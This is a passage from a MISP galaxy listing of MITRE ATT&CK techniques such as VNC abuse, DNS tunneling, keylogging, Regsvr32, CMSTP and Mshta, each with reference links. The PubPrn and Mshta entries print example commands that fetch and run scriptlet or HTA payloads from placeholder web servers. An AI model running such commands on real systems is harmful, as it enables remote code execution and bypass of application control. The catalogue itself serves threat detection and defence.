VNC differs from [Remote Desktop Protocol](https://attack.mitre.org/techniques/T1021/001) as VNC is screen-sharing software rather than resource-sharing software. By default, VNC uses the system’s authentication, but it can be configured to use credentials specific to VNC.(Citation: MacOS VNC software for Remote Desktop)(Citation: VNC Authentication)

Adversaries may abuse VNC to perform malicious actions as the logged-on user such as opening documents, downloading files, and running arbitrary commands. An adversary could use VNC to remotely control and monitor a system to collect data and information to pivot to other systems within the network. Specific VNC libraries/implementations have also been susceptible to brute force attacks and memory usage exploitation.(Citation: Hijacking VNC)(Citation: macOS root VNC login without authentication)(Citation: VNC Vulnerabilities)(Citation: Offensive Security VNC Authentication Check)(Citation: Attacking VNC Servers PentestLab)(Citation: Havana authentication bug)

The tag is: misp-galaxy:mitre-attack-pattern="VNC - T1021.005"

Table 6346. Table References

Links

http://lists.openstack.org/pipermail/openstack/2013-December/004138.html

https://attack.mitre.org/techniques/T1021/005

https://datatracker.ietf.org/doc/html/rfc6143#section-7.2.2

https://gitlab.gnome.org/GNOME/gnome-remote-desktop/-/blob/9aa9181e/src/grd-settings.c#L207

https://gitlab.gnome.org/GNOME/gnome-remote-desktop/-/blob/9aa9181e/src/org.gnome.desktop.remote-desktop.gschema.xml.in

https://help.realvnc.com/hc/en-us/articles/360002250097-Setting-up-System-Authentication

https://int0x33.medium.com/day-70-hijacking-vnc-enum-brute-access-and-crack-d3d18a4601cc

https://pentestlab.blog/2012/10/30/attacking-vnc-servers/

https://sarah-edwards-xzkc.squarespace.com/blog/2020/4/30/analysis-of-apple-unified-logs-quarantine-edition-entry-6-working-from-home-remote-logins

https://support.apple.com/guide/remote-desktop/set-up-a-computer-running-vnc-software-apdbed09830/mac

https://www.bleepingcomputer.com/news/security/dozens-of-vnc-vulnerabilities-found-in-linux-windows-solutions/

https://www.offensive-security.com/metasploit-unleashed/vnc-authentication/

https://www.tenable.com/blog/detecting-macos-high-sierra-root-account-without-authentication

Steganography - T1406.001

Adversaries may use steganography techniques in order to prevent the detection of hidden information. Steganographic techniques can be used to hide data in digital media such as images, audio tracks, video clips, or text files.

The tag is: misp-galaxy:mitre-attack-pattern="Steganography - T1406.001"

Table 6347. Table References

Links

https://attack.mitre.org/techniques/T1406/001

DNS - T1071.004

Adversaries may communicate using the Domain Name System (DNS) application layer protocol to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.

The DNS protocol serves an administrative function in computer networking and thus may be very common in environments. DNS traffic may also be allowed even before network authentication is completed. DNS packets contain many fields and headers in which data can be concealed. Often known as DNS tunneling, adversaries may abuse DNS to communicate with systems under their control within a victim network while also mimicking normal, expected traffic.(Citation: PAN DNS Tunneling)(Citation: Medium DnsTunneling)

The tag is: misp-galaxy:mitre-attack-pattern="DNS - T1071.004"

Table 6348. Table References

Links

https://arxiv.org/ftp/arxiv/papers/1408/1408.1136.pdf

https://attack.mitre.org/techniques/T1071/004

https://medium.com/@galolbardes/learn-how-easy-is-to-bypass-firewalls-using-dns-tunneling-and-also-how-to-block-it-3ed652f4a000

https://www.paloaltonetworks.com/cyberpedia/what-is-dns-tunneling

Keylogging - T1056.001

Adversaries may log user keystrokes to intercept credentials as the user types them. Keylogging is likely to be used to acquire credentials for new access opportunities when [OS Credential Dumping](https://attack.mitre.org/techniques/T1003) efforts are not effective, and may require an adversary to intercept keystrokes on a system for a substantial period of time before credentials can be successfully captured. In order to increase the likelihood of capturing credentials quickly, an adversary may also perform actions such as clearing browser cookies to force users to reauthenticate to systems.(Citation: Talos Kimsuky Nov 2021)

Keylogging is the most prevalent type of input capture, with many different ways of intercepting keystrokes.(Citation: Adventures of a Keystroke) Some methods include:

  • Hooking API callbacks used for processing keystrokes. Unlike [Credential API Hooking](https://attack.mitre.org/techniques/T1056/004), this focuses solely on API functions intended for processing keystroke data.

  • Reading raw keystroke data from the hardware buffer.

  • Windows Registry modifications.

  • Custom drivers.

  • [Modify System Image](https://attack.mitre.org/techniques/T1601) may provide adversaries with hooks into the operating system of network devices to read raw keystrokes for login sessions.(Citation: Cisco Blog Legacy Device Attacks)

The tag is: misp-galaxy:mitre-attack-pattern="Keylogging - T1056.001"

Table 6349. Table References

Links

http://opensecuritytraining.info/Keylogging_files/The%20Adventures%20of%20a%20Keystroke.pdf

https://attack.mitre.org/techniques/T1056/001

https://blog.talosintelligence.com/2021/11/kimsuky-abuses-blogs-delivers-malware.html

https://community.cisco.com/t5/security-blogs/attackers-continue-to-target-legacy-devices/ba-p/4169954

PowerShell - T1059.001

Adversaries may abuse PowerShell commands and scripts for execution. PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system.(Citation: TechNet PowerShell) Adversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code. Examples include the <code>Start-Process</code> cmdlet which can be used to run an executable and the <code>Invoke-Command</code> cmdlet which runs a command locally or on a remote computer (though administrator permissions are required to use PowerShell to connect to remote systems).

PowerShell may also be used to download and run executables from the Internet, which can be executed from disk or in memory without touching disk.

A number of PowerShell-based offensive testing tools are available, including [Empire](https://attack.mitre.org/software/S0363), [PowerSploit](https://attack.mitre.org/software/S0194), [PoshC2](https://attack.mitre.org/software/S0378), and PSAttack.(Citation: Github PSAttack)

PowerShell commands/scripts can also be executed without directly invoking the <code>powershell.exe</code> binary through interfaces to PowerShell’s underlying <code>System.Management.Automation</code> assembly DLL exposed through the .NET framework and Windows Common Language Interface (CLI).(Citation: Sixdub PowerPick Jan 2016)(Citation: SilentBreak Offensive PS Dec 2015)(Citation: Microsoft PSfromCsharp APR 2014)

The tag is: misp-galaxy:mitre-attack-pattern="PowerShell - T1059.001"

Table 6350. Table References

Links

http://www.malwarearchaeology.com/s/Windows-PowerShell-Logging-Cheat-Sheet-ver-June-2016-v2.pdf

https://attack.mitre.org/techniques/T1059/001

https://blogs.msdn.microsoft.com/kebab/2014/04/28/executing-powershell-scripts-from-c/

https://github.com/jaredhaight/PSAttack

https://powershellmagazine.com/2014/07/16/investigating-powershell-attacks/

https://technet.microsoft.com/en-us/scriptcenter/dd742419.aspx

https://web.archive.org/web/20160327101330/http://www.sixdub.net/?p=367

https://web.archive.org/web/20190508170150/https://silentbreaksecurity.com/powershell-jobs-without-powershell-exe/

https://www.fireeye.com/blog/threat-research/2016/02/greater_visibilityt.html

At - T1053.002

Adversaries may abuse the [at](https://attack.mitre.org/software/S0110) utility to perform task scheduling for initial or recurring execution of malicious code. The [at](https://attack.mitre.org/software/S0110) utility exists as an executable within Windows, Linux, and macOS for scheduling tasks at a specified time and date. Although deprecated in favor of [Scheduled Task](https://attack.mitre.org/techniques/T1053/005)'s [schtasks](https://attack.mitre.org/software/S0111) in Windows environments, using [at](https://attack.mitre.org/software/S0110) requires that the Task Scheduler service be running, and the user to be logged on as a member of the local Administrators group.

On Linux and macOS, [at](https://attack.mitre.org/software/S0110) may be invoked by the superuser as well as any users added to the <code>at.allow</code> file. If the <code>at.allow</code> file does not exist, the <code>at.deny</code> file is checked. Every username not listed in <code>at.deny</code> is allowed to invoke [at](https://attack.mitre.org/software/S0110). If the <code>at.deny</code> exists and is empty, global use of [at](https://attack.mitre.org/software/S0110) is permitted. If neither file exists (which is often the baseline) only the superuser is allowed to use [at](https://attack.mitre.org/software/S0110).(Citation: Linux at)

Adversaries may use [at](https://attack.mitre.org/software/S0110) to execute programs at system startup or on a scheduled basis for [Persistence](https://attack.mitre.org/tactics/TA0003). [at](https://attack.mitre.org/software/S0110) can also be abused to conduct remote [Execution](https://attack.mitre.org/tactics/TA0002) as part of [Lateral Movement](https://attack.mitre.org/tactics/TA0008) and/or to run a process under the context of a specified account (such as SYSTEM).

In Linux environments, adversaries may also abuse [at](https://attack.mitre.org/software/S0110) to break out of restricted environments by using a task to spawn an interactive system shell or to run system commands. Similarly, [at](https://attack.mitre.org/software/S0110) may also be used for [Privilege Escalation](https://attack.mitre.org/tactics/TA0004) if the binary is allowed to run as superuser via <code>sudo</code>.(Citation: GTFObins at)

The tag is: misp-galaxy:mitre-attack-pattern="At - T1053.002"

Table 6351. Table References

Links

https://attack.mitre.org/techniques/T1053/002

https://docs.microsoft.com/en-us/windows/security/threat-protection/auditing/audit-other-object-access-events

https://gtfobins.github.io/gtfobins/at/

https://man7.org/linux/man-pages/man1/at.1p.html

https://social.technet.microsoft.com/Forums/en-US/e5bca729-52e7-4fcb-ba12-3225c564674c/scheduled-tasks-history-retention-settings?forum=winserver8gen

https://technet.microsoft.com/en-us/sysinternals/bb963902

https://technet.microsoft.com/library/dd315590.aspx

https://twitter.com/leoloobeek/status/939248813465853953

https://www.linkedin.com/pulse/getting-attacker-ip-address-from-malicious-linux-job-craig-rowland/

Steganography - T1027.003

Adversaries may use steganography techniques in order to prevent the detection of hidden information. Steganographic techniques can be used to hide data in digital media such as images, audio tracks, video clips, or text files.

[Duqu](https://attack.mitre.org/software/S0038) was an early example of malware that used steganography. It encrypted the gathered information from a victim’s system and hid it within an image before exfiltrating the image to a C2 server.(Citation: Wikipedia Duqu)

By the end of 2017, a threat group used <code>Invoke-PSImage</code> to hide [PowerShell](https://attack.mitre.org/techniques/T1059/001) commands in an image file (.png) and execute the code on a victim’s system. In this particular case the [PowerShell](https://attack.mitre.org/techniques/T1059/001) code downloaded another obfuscated script to gather intelligence from the victim’s machine and communicate it back to the adversary.(Citation: McAfee Malicious Doc Targets Pyeongchang Olympics)

The tag is: misp-galaxy:mitre-attack-pattern="Steganography - T1027.003"

Table 6352. Table References

Links

https://attack.mitre.org/techniques/T1027/003

https://en.wikipedia.org/wiki/Duqu

https://securingtomorrow.mcafee.com/mcafee-labs/malicious-document-targets-pyeongchang-olympics/

AppleScript - T1059.002

Adversaries may abuse AppleScript for execution. AppleScript is a macOS scripting language designed to control applications and parts of the OS via inter-application messages called AppleEvents.(Citation: Apple AppleScript) These AppleEvent messages can be sent independently or easily scripted with AppleScript. These events can locate open windows, send keystrokes, and interact with almost any open application locally or remotely.

Scripts can be run from the command-line via <code>osascript /path/to/script</code> or <code>osascript -e "script here"</code>. Aside from the command line, scripts can be executed in numerous ways including Mail rules, Calendar.app alarms, and Automator workflows. AppleScripts can also be executed as plain text shell scripts by adding <code>#!/usr/bin/osascript</code> to the start of the script file.(Citation: SentinelOne AppleScript)

AppleScripts do not need to call <code>osascript</code> to execute. However, they may be executed from within mach-O binaries by using the macOS [Native API](https://attack.mitre.org/techniques/T1106)s <code>NSAppleScript</code> or <code>OSAScript</code>, both of which execute code independent of the <code>/usr/bin/osascript</code> command line utility.

Adversaries may abuse AppleScript to execute various behaviors, such as interacting with an open SSH connection, moving to remote machines, and even presenting users with fake dialog boxes. These events cannot start applications remotely (they can start them locally), but they can interact with applications if they’re already running remotely. On macOS 10.10 Yosemite and higher, AppleScript has the ability to execute [Native API](https://attack.mitre.org/techniques/T1106)s, which otherwise would require compilation and execution in a mach-O binary file format.(Citation: SentinelOne macOS Red Team) Since this is a scripting language, it can be used to launch more common techniques as well such as a reverse shell via [Python](https://attack.mitre.org/techniques/T1059/006).(Citation: Macro Malware Targets Macs)

The tag is: misp-galaxy:mitre-attack-pattern="AppleScript - T1059.002"

Table 6353. Table References

Links

https://attack.mitre.org/techniques/T1059/002

https://developer.apple.com/library/archive/documentation/AppleScript/Conceptual/AppleScriptLangGuide/introduction/ASLR_intro.html

https://www.mcafee.com/blogs/other-blogs/mcafee-labs/macro-malware-targets-macs/

https://www.sentinelone.com/blog/how-offensive-actors-use-applescript-for-attacking-macos/

https://www.sentinelone.com/blog/macos-red-team-calling-apple-apis-without-building-binaries/

DNS - T1590.002

Adversaries may gather information about the victim’s DNS that can be used during targeting. DNS information may include a variety of details, including registered name servers as well as records that outline addressing for a target’s subdomains, mail servers, and other hosts. DNS, MX, TXT, and SPF records may also reveal the use of third party cloud and SaaS providers, such as Office 365, G Suite, Salesforce, or Zendesk.(Citation: Sean Metcalf Twitter DNS Records)

Adversaries may gather this information in various ways, such as querying or otherwise collecting details via [DNS/Passive DNS](https://attack.mitre.org/techniques/T1596/001). DNS information may also be exposed to adversaries via online or other accessible data sets (ex: [Search Open Technical Databases](https://attack.mitre.org/techniques/T1596)).(Citation: DNS Dumpster)(Citation: Circl Passive DNS) Gathering this information may reveal opportunities for other forms of reconnaissance (ex: [Search Open Technical Databases](https://attack.mitre.org/techniques/T1596), [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593), or [Active Scanning](https://attack.mitre.org/techniques/T1595)), establishing operational resources (ex: [Acquire Infrastructure](https://attack.mitre.org/techniques/T1583) or [Compromise Infrastructure](https://attack.mitre.org/techniques/T1584)), and/or initial access (ex: [External Remote Services](https://attack.mitre.org/techniques/T1133)).

The tag is: misp-galaxy:mitre-attack-pattern="DNS - T1590.002"

Table 6354. Table References

Links

https://attack.mitre.org/techniques/T1590/002

https://dnsdumpster.com/

https://twitter.com/PyroTek3/status/1126487227712921600/photo/1

https://www.circl.lu/services/passive-dns/

Cron - T1053.003

Adversaries may abuse the <code>cron</code> utility to perform task scheduling for initial or recurring execution of malicious code.(Citation: 20 macOS Common Tools and Techniques) The <code>cron</code> utility is a time-based job scheduler for Unix-like operating systems. The <code> crontab</code> file contains the schedule of cron entries to be run and the specified times for execution. Any <code>crontab</code> files are stored in operating system-specific file paths.

An adversary may use <code>cron</code> in Linux or Unix environments to execute programs at system startup or on a scheduled basis for [Persistence](https://attack.mitre.org/tactics/TA0003).

The tag is: misp-galaxy:mitre-attack-pattern="Cron - T1053.003"

Table 6355. Table References

Links

https://attack.mitre.org/techniques/T1053/003

https://labs.sentinelone.com/20-common-tools-techniques-used-by-macos-threat-actors-malware/

Launchd - T1053.004

This technique is deprecated due to the inaccurate usage. The report cited did not provide technical detail as to how the malware interacted directly with launchd rather than going through known services. Other system services are used to interact with launchd rather than launchd being used by itself.

Adversaries may abuse the <code>Launchd</code> daemon to perform task scheduling for initial or recurring execution of malicious code. The <code>launchd</code> daemon, native to macOS, is responsible for loading and maintaining services within the operating system. This process loads the parameters for each launch-on-demand system-level daemon from the property list (plist) files found in <code>/System/Library/LaunchDaemons</code> and <code>/Library/LaunchDaemons</code> (Citation: AppleDocs Launch Agent Daemons). These LaunchDaemons have property list files which point to the executables that will be launched (Citation: Methods of Mac Malware Persistence).

An adversary may use the <code>launchd</code> daemon in macOS environments to schedule new executables to run at system startup or on a scheduled basis for persistence. <code>launchd</code> can also be abused to run a process under the context of a specified account. Daemons, such as <code>launchd</code>, run with the permissions of the root user account, and will operate regardless of which user account is logged in.

The tag is: misp-galaxy:mitre-attack-pattern="Launchd - T1053.004"

Table 6356. Table References

Links

https://attack.mitre.org/techniques/T1053/004

https://developer.apple.com/library/content/documentation/MacOSX/Conceptual/BPSystemStartup/Chapters/CreatingLaunchdJobs.html

https://www.virusbulletin.com/uploads/pdf/conference/vb2014/VB2014-Wardle.pdf

Python - T1059.006

Adversaries may abuse Python commands and scripts for execution. Python is a very popular scripting/programming language, with capabilities to perform many functions. Python can be executed interactively from the command-line (via the <code>python.exe</code> interpreter) or via scripts (.py) that can be written and distributed to different systems. Python code can also be compiled into binary executables.

Python comes with many built-in packages to interact with the underlying system, such as file operations and device I/O. Adversaries can use these libraries to download and execute commands or other scripts as well as perform various malicious behaviors.

The tag is: misp-galaxy:mitre-attack-pattern="Python - T1059.006"

Table 6357. Table References

Links

https://attack.mitre.org/techniques/T1059/006

JavaScript - T1059.007

Adversaries may abuse various implementations of JavaScript for execution. JavaScript (JS) is a platform-independent scripting language (compiled just-in-time at runtime) commonly associated with scripts in webpages, though JS can be executed in runtime environments outside the browser.(Citation: NodeJS)

JScript is the Microsoft implementation of the same scripting standard. JScript is interpreted via the Windows Script engine and thus integrated with many components of Windows such as the [Component Object Model](https://attack.mitre.org/techniques/T1559/001) and Internet Explorer HTML Application (HTA) pages.(Citation: JScrip May 2018)(Citation: Microsoft JScript 2007)(Citation: Microsoft Windows Scripts)

JavaScript for Automation (JXA) is a macOS scripting language based on JavaScript, included as part of Apple’s Open Scripting Architecture (OSA), that was introduced in OSX 10.10. Apple’s OSA provides scripting capabilities to control applications, interface with the operating system, and bridge access into the rest of Apple’s internal APIs. As of OSX 10.10, OSA only supports two languages, JXA and [AppleScript](https://attack.mitre.org/techniques/T1059/002). Scripts can be executed via the command line utility <code>osascript</code>, they can be compiled into applications or script files via <code>osacompile</code>, and they can be compiled and executed in memory of other programs by leveraging the OSAKit Framework.(Citation: Apple About Mac Scripting 2016)(Citation: SpecterOps JXA 2020)(Citation: SentinelOne macOS Red Team)(Citation: Red Canary Silver Sparrow Feb2021)(Citation: MDSec macOS JXA and VSCode)

Adversaries may abuse various implementations of JavaScript to execute various behaviors. Common uses include hosting malicious scripts on websites as part of a [Drive-by Compromise](https://attack.mitre.org/techniques/T1189) or downloading and executing these script files as secondary payloads. Since these payloads are text-based, it is also very common for adversaries to obfuscate their content as part of [Obfuscated Files or Information](https://attack.mitre.org/techniques/T1027).

The tag is: misp-galaxy:mitre-attack-pattern="JavaScript - T1059.007"

Table 6358. Table References

Links

https://attack.mitre.org/techniques/T1059/007

https://developer.apple.com/library/archive/documentation/LanguagesUtilities/Conceptual/MacAutomationScriptingGuide/index.html

https://docs.microsoft.com/archive/blogs/gauravseth/the-world-of-jscript-javascript-ecmascript

https://docs.microsoft.com/scripting/winscript/windows-script-interfaces

https://docs.microsoft.com/windows/win32/com/translating-to-jscript

https://nodejs.org/

https://posts.specterops.io/persistent-jxa-66e1c3cd1cf5

https://redcanary.com/blog/clipping-silver-sparrows-wings/

https://www.mdsec.co.uk/2021/01/macos-post-exploitation-shenanigans-with-vscode-extensions/

https://www.sentinelone.com/blog/macos-red-team-calling-apple-apis-without-building-binaries/

Regsvr32 - T1218.010

Adversaries may abuse Regsvr32.exe to proxy execution of malicious code. Regsvr32.exe is a command-line program used to register and unregister object linking and embedding controls, including dynamic link libraries (DLLs), on Windows systems. The Regsvr32.exe binary may also be signed by Microsoft. (Citation: Microsoft Regsvr32)

Malicious usage of Regsvr32.exe may avoid triggering security tools that may not monitor execution of, and modules loaded by, the regsvr32.exe process because of allowlists or false positives from Windows using regsvr32.exe for normal operations. Regsvr32.exe can also be used to specifically bypass application control using functionality to load COM scriptlets to execute DLLs under user permissions. Since Regsvr32.exe is network and proxy aware, the scripts can be loaded by passing a uniform resource locator (URL) to file on an external Web server as an argument during invocation. This method makes no changes to the Registry as the COM object is not actually registered, only executed. (Citation: LOLBAS Regsvr32) This variation of the technique is often referred to as a "Squiblydoo" and has been used in campaigns targeting governments. (Citation: Carbon Black Squiblydoo Apr 2016) (Citation: FireEye Regsvr32 Targeting Mongolian Gov)

Regsvr32.exe can also be leveraged to register a COM Object used to establish persistence via [Component Object Model Hijacking](https://attack.mitre.org/techniques/T1546/015). (Citation: Carbon Black Squiblydoo Apr 2016)

The tag is: misp-galaxy:mitre-attack-pattern="Regsvr32 - T1218.010"

Table 6359. Table References

Links

https://attack.mitre.org/techniques/T1218/010

https://lolbas-project.github.io/lolbas/Binaries/Regsvr32/

https://support.microsoft.com/en-us/kb/249873

https://www.carbonblack.com/2016/04/28/threat-advisory-squiblydoo-continues-trend-of-attackers-using-native-os-tools-to-live-off-the-land/

https://www.fireeye.com/blog/threat-research/2017/02/spear_phishing_techn.html

Confluence - T1213.001

Adversaries may leverage Confluence repositories to mine valuable information. Often found in development environments alongside Atlassian JIRA, Confluence is generally used to store development-related documentation, however, in general may contain more diverse categories of useful information, such as:

  • Policies, procedures, and standards

  • Physical / logical network diagrams

  • System architecture diagrams

  • Technical system documentation

  • Testing / development credentials

  • Work / project schedules

  • Source code snippets

  • Links to network shares and other internal resources

The tag is: misp-galaxy:mitre-attack-pattern="Confluence - T1213.001"

Table 6360. Table References

Links

https://attack.mitre.org/techniques/T1213/001

https://confluence.atlassian.com/confkb/how-to-enable-user-access-logging-182943.html

PubPrn - T1216.001

Adversaries may use PubPrn to proxy execution of malicious remote files. PubPrn.vbs is a [Visual Basic](https://attack.mitre.org/techniques/T1059/005) script that publishes a printer to Active Directory Domain Services. The script may be signed by Microsoft and is commonly executed through the [Windows Command Shell](https://attack.mitre.org/techniques/T1059/003) via <code>Cscript.exe</code>. For example, the following code publishes a printer within the specified domain: <code>cscript pubprn Printer1 LDAP://CN=Container1,DC=Domain1,DC=Com</code>.(Citation: pubprn)

Adversaries may abuse PubPrn to execute malicious payloads hosted on remote sites.(Citation: Enigma0x3 PubPrn Bypass) To do so, adversaries may set the second <code>script:</code> parameter to reference a scriptlet file (.sct) hosted on a remote site. An example command is <code>pubprn.vbs 127.0.0.1 script:https://mydomain.com/folder/file.sct</code>. This behavior may bypass signature validation restrictions and application control solutions that do not account for abuse of this script.

In later versions of Windows (10+), <code>PubPrn.vbs</code> has been updated to prevent proxying execution from a remote site. This is done by limiting the protocol specified in the second parameter to <code>LDAP://</code>, vice the <code>script:</code> moniker which could be used to reference remote code via HTTP(S).

The tag is: misp-galaxy:mitre-attack-pattern="PubPrn - T1216.001"

Table 6361. Table References

Links

https://attack.mitre.org/techniques/T1216/001

https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/pubprn

https://enigma0x3.net/2017/08/03/wsh-injection-a-case-study/

MSBuild - T1127.001

Adversaries may use MSBuild to proxy execution of code through a trusted Windows utility. MSBuild.exe (Microsoft Build Engine) is a software build platform used by Visual Studio. It handles XML formatted project files that define requirements for loading and building various platforms and configurations.(Citation: MSDN MSBuild)

Adversaries can abuse MSBuild to proxy execution of malicious code. The inline task capability of MSBuild that was introduced in .NET version 4 allows for C# or Visual Basic code to be inserted into an XML project file.(Citation: MSDN MSBuild)(Citation: Microsoft MSBuild Inline Tasks 2017) MSBuild will compile and execute the inline task. MSBuild.exe is a signed Microsoft binary, so when it is used this way it can execute arbitrary code and bypass application control defenses that are configured to allow MSBuild.exe execution.(Citation: LOLBAS Msbuild)

The tag is: misp-galaxy:mitre-attack-pattern="MSBuild - T1127.001"

Table 6362. Table References

Links

https://attack.mitre.org/techniques/T1127/001

https://docs.microsoft.com/en-us/visualstudio/msbuild/msbuild-inline-tasks?view=vs-2019#code-element

https://lolbas-project.github.io/lolbas/Binaries/Msbuild/

https://msdn.microsoft.com/library/dd393574.aspx

Keylogging - T1417.001

Adversaries may log user keystrokes to intercept credentials or other information from the user as the user types them.

Some methods of keylogging include:

  • Masquerading as a legitimate third-party keyboard to record user keystrokes.(Citation: Zeltser-Keyboard) On both Android and iOS, users must explicitly authorize the use of third-party keyboard apps. Users should be advised to use extreme caution before granting this authorization when it is requested.

  • Abusing accessibility features. On Android, adversaries may abuse accessibility features to record keystrokes by registering an AccessibilityService class, overriding the onAccessibilityEvent method, and listening for the AccessibilityEvent.TYPE_VIEW_TEXT_CHANGED event type. The event object passed into the function will contain the data that the user typed. *Additional methods of keylogging may be possible if root access is available.

The tag is: misp-galaxy:mitre-attack-pattern="Keylogging - T1417.001"

Table 6363. Table References

Links

https://attack.mitre.org/techniques/T1417/001

https://pages.nist.gov/mobile-threat-catalogue/authentication-threats/AUT-13.html

https://zeltser.com/third-party-keyboards-security/

Sharepoint - T1213.002

Adversaries may leverage the SharePoint repository as a source to mine valuable information. SharePoint will often contain useful information for an adversary to learn about the structure and functionality of the internal network and systems. For example, the following is a list of example information that may hold potential value to an adversary and may also be found on SharePoint:

  • Policies, procedures, and standards

  • Physical / logical network diagrams

  • System architecture diagrams

  • Technical system documentation

  • Testing / development credentials

  • Work / project schedules

  • Source code snippets

  • Links to network shares and other internal resources

The tag is: misp-galaxy:mitre-attack-pattern="Sharepoint - T1213.002"

Table 6364. Table References

Links

https://attack.mitre.org/techniques/T1213/002

https://support.office.com/en-us/article/configure-audit-settings-for-a-site-collection-a9920c97-38c0-44f2-8bcb-4cf1e2ae22d2

CMSTP - T1218.003

Adversaries may abuse CMSTP to proxy execution of malicious code. The Microsoft Connection Manager Profile Installer (CMSTP.exe) is a command-line program used to install Connection Manager service profiles. (Citation: Microsoft Connection Manager Oct 2009) CMSTP.exe accepts an installation information file (INF) as a parameter and installs a service profile leveraged for remote access connections.

Adversaries may supply CMSTP.exe with INF files infected with malicious commands. (Citation: Twitter CMSTP Usage Jan 2018) Similar to [Regsvr32](https://attack.mitre.org/techniques/T1218/010) / ”Squiblydoo”, CMSTP.exe may be abused to load and execute DLLs (Citation: MSitPros CMSTP Aug 2017) and/or COM scriptlets (SCT) from remote servers. (Citation: Twitter CMSTP Jan 2018) (Citation: GitHub Ultimate AppLocker Bypass List) (Citation: Endurant CMSTP July 2018) This execution may also bypass AppLocker and other application control defenses since CMSTP.exe is a legitimate binary that may be signed by Microsoft.

CMSTP.exe can also be abused to [Bypass User Account Control](https://attack.mitre.org/techniques/T1548/002) and execute arbitrary commands from a malicious INF through an auto-elevated COM interface. (Citation: MSitPros CMSTP Aug 2017) (Citation: GitHub Ultimate AppLocker Bypass List) (Citation: Endurant CMSTP July 2018)

The tag is: misp-galaxy:mitre-attack-pattern="CMSTP - T1218.003"

Table 6365. Table References

Links

http://www.endurant.io/cmstp/detecting-cmstp-enabled-code-execution-and-uac-bypass-with-sysmon/

https://attack.mitre.org/techniques/T1218/003

https://docs.microsoft.com/previous-versions/windows/it-pro/windows-server-2003/cc786431(v=ws.10)

https://github.com/api0cradle/UltimateAppLockerByPassList

https://msitpros.com/?p=3960

https://twitter.com/ItsReallyNick/status/958789644165894146

https://twitter.com/NickTyrer/status/958450014111633408

InstallUtil - T1218.004

Adversaries may use InstallUtil to proxy execution of code through a trusted Windows utility. InstallUtil is a command-line utility that allows for installation and uninstallation of resources by executing specific installer components specified in .NET binaries. (Citation: MSDN InstallUtil) The InstallUtil binary may also be digitally signed by Microsoft and located in the .NET directories on a Windows system: <code>C:\Windows\Microsoft.NET\Framework\v<version>\InstallUtil.exe</code> and <code>C:\Windows\Microsoft.NET\Framework64\v<version>\InstallUtil.exe</code>.

InstallUtil may also be used to bypass application control through use of attributes within the binary that execute the class decorated with the attribute <code>[System.ComponentModel.RunInstaller(true)]</code>. (Citation: LOLBAS Installutil)

The tag is: misp-galaxy:mitre-attack-pattern="InstallUtil - T1218.004"

Table 6366. Table References

Links

https://attack.mitre.org/techniques/T1218/004

https://lolbas-project.github.io/lolbas/Binaries/Installutil/

https://msdn.microsoft.com/en-us/library/50614e95.aspx

Mshta - T1218.005

Adversaries may abuse mshta.exe to proxy execution of malicious .hta files and Javascript or VBScript through a trusted Windows utility. There are several examples of different types of threats leveraging mshta.exe during initial compromise and for execution of code (Citation: Cylance Dust Storm) (Citation: Red Canary HTA Abuse Part Deux) (Citation: FireEye Attacks Leveraging HTA) (Citation: Airbus Security Kovter Analysis) (Citation: FireEye FIN7 April 2017)

Mshta.exe is a utility that executes Microsoft HTML Applications (HTA) files. (Citation: Wikipedia HTML Application) HTAs are standalone applications that execute using the same models and technologies of Internet Explorer, but outside of the browser. (Citation: MSDN HTML Applications)

Files may be executed by mshta.exe through an inline script: <code>mshta vbscript:Close(Execute("GetObject(""script:https[:]//webserver/payload[.]sct"")"))</code>

They may also be executed directly from URLs: <code>mshta http[:]//webserver/payload[.]hta</code>

Mshta.exe can be used to bypass application control solutions that do not account for its potential use. Since mshta.exe executes outside of the Internet Explorer’s security context, it also bypasses browser security settings. (Citation: LOLBAS Mshta)

The tag is: misp-galaxy:mitre-attack-pattern="Mshta - T1218.005"

Table 6367. Table References

Links

https://airbus-cyber-security.com/fileless-malware-behavioural-analysis-kovter-persistence/

https://attack.mitre.org/techniques/T1218/005

https://en.wikipedia.org/wiki/HTML_Application

https://lolbas-project.github.io/lolbas/Binaries/Mshta/

https://msdn.microsoft.com/library/ms536471.aspx

https://s7d2.scene7.com/is/content/cylance/prod/cylance-web/en-us/resources/knowledge-center/resource-library/reports/Op_Dust_Storm_Report.pdf

https://www.fireeye.com/blog/threat-research/2017/04/cve-2017-0199-hta-handler.html

https://www.fireeye.com/blog/threat-research/2017/04/fin7-phishing-lnk.html

https://www.redcanary.com/blog/microsoft-html-application-hta-abuse-part-deux/

Hardware - T1592.001

Adversaries may gather information about the victim’s host hardware that can be used during targeting. Information about hardware infrastructure may include a variety of details such as types and versions on specific hosts, as well as the presence of additional components that might be indicative of added defensive protections (ex: card/biometric readers, dedicated encryption hardware, etc.).

Adversaries may gather this information in various ways, such as direct collection actions via [Active Scanning](https://attack.mitre.org/techniques/T1595) (ex: hostnames, server banners, user agent strings) or [Phishing for Information](https://attack.mitre.org/techniques/T1598). Adversaries may also compromise sites then include malicious content designed to collect host information from visitors.(Citation: ATT ScanBox) Information about the hardware infrastructure may also be exposed to adversaries via online or other accessible data sets (ex: job postings, network maps, assessment reports, resumes, or purchase invoices). Gathering this information may reveal opportunities for other forms of reconnaissance (ex: [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593) or [Search Open Technical Databases](https://attack.mitre.org/techniques/T1596)), establishing operational resources (ex: [Develop Capabilities](https://attack.mitre.org/techniques/T1587) or [Obtain Capabilities](https://attack.mitre.org/techniques/T1588)), and/or initial access (ex: [Compromise Hardware Supply Chain](https://attack.mitre.org/techniques/T1195/003) or [Hardware Additions](https://attack.mitre.org/techniques/T1200)).

The tag is: misp-galaxy:mitre-attack-pattern="Hardware - T1592.001"

Table 6368. Table References

Links

https://attack.mitre.org/techniques/T1592/001

https://cybersecurity.att.com/blogs/labs-research/scanbox-a-reconnaissance-framework-used-on-watering-hole-attacks

https://threatconnect.com/blog/infrastructure-research-hunting/

Geofencing - T1627.001

Adversaries may use a device’s geographical location to limit certain malicious behaviors. For example, malware operators may limit the distribution of a second stage payload to certain geographic regions.(Citation: Lookout eSurv)

[Geofencing](https://attack.mitre.org/techniques/T1627/001) is accomplished by persuading the user to grant the application permission to access location services. The application can then collect, process, and exfiltrate the device’s location to perform location-based actions, such as ceasing malicious behavior or showing region-specific advertisements.

